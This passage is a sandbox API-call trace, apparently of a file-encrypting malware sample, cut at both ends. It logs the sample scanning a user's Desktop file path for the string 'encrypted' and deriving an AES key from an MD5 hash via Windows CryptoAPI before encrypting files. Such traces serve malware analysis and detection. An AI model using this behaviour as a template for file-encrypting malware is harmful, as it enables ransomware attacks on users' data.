HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.745] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="33uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YXhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Xhl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hl8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vtf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tjNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jNI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NI\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TvRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vRnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RnehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0031.746] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ehFM.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0031.746] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0031.746] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0031.746] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0031.747] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0031.747] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0031.747] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.747] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.747] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.747] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0031.747] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.747] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd98fee0, ftCreationTime.dwHighDateTime=0x1d5b768, ftLastAccessTime.dwLowDateTime=0x54d03240, ftLastAccessTime.dwHighDateTime=0x1d5c378, ftLastWriteTime.dwLowDateTime=0x54d03240, ftLastWriteTime.dwHighDateTime=0x1d5c378, nFileSizeHigh=0x0, nFileSizeLow=0xd984, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="n0TvRnehFM.swf", cAlternateFileName="N0TVRN~1.SWF")) returned 0x7c2240 [0031.747] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0031.747] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.747] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.747] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.747] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0031.747] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.747] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0031.747] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.747] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0031.748] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.748] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.748] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.748] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.748] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.748] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0031.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.748] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0031.749] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.749] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0031.749] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.749] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.749] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.749] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0031.749] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.749] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.749] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.749] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.749] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.749] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.750] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.750] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.750] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.750] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.750] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.750] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.750] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0031.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.750] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0031.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.750] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.751] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.751] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.751] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0031.751] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.751] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.751] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.751] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.751] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.751] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0031.751] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.751] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, 